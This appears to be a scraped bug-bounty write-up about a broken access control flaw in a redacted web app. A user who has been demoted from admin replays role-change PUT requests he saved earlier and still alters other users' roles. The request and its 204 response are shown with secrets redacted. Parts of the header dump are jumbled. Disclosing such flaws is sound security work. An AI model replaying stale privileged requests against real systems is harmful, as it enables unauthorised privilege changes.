.png)
5 hours ago
6 BOOK THIS SPACE FOR AD
ARTICLE ADFirst, we have two users (user1 and user2). User1 invites user2 to his org team and gives him an Admin role![]()
![]()
Host: [REDACTED]
Cookie: sessionIdManager=REDACTED; __Secure-csrf=REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [REDACTED]/contacts
Content-Type: application/json
X-Cb-Csrf: REDACTED
X-Is-Ajax-Call: true
Content-Length: 0
Origin: [REDACTED]
Date: Wed, 13 Nov 2024 16:18:47 GMT
Connection: keep-alive
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-requestid: REDACTED
2. Then, user2 downgrades user1’s role to an internal user, which has basic and limited permissions.
3. Now, user1 was holding some requests that could downgrade or upgrade other users’ roles in the org, and when he tries them, he can easily change the roles of the users!
The request :PUT /__api/v0_1/company/REDACTED/user/REDACTED/roles HTTP/1.1Host: [REDACTED]
Cookie: sessionIdManager=REDACTED; __Secure-csrf=REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [REDACTED]/contacts
Content-Type: application/json
X-Cb-Csrf: REDACTED
X-Is-Ajax-Call: true
Content-Length: 0
Origin: [REDACTED]
["user"]
The response:HTTP/1.1 204 No ContentDate: Wed, 13 Nov 2024 16:18:47 GMT
Connection: keep-alive
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-requestid: REDACTED
Bengali (Bangladesh) · 
English (United States) ·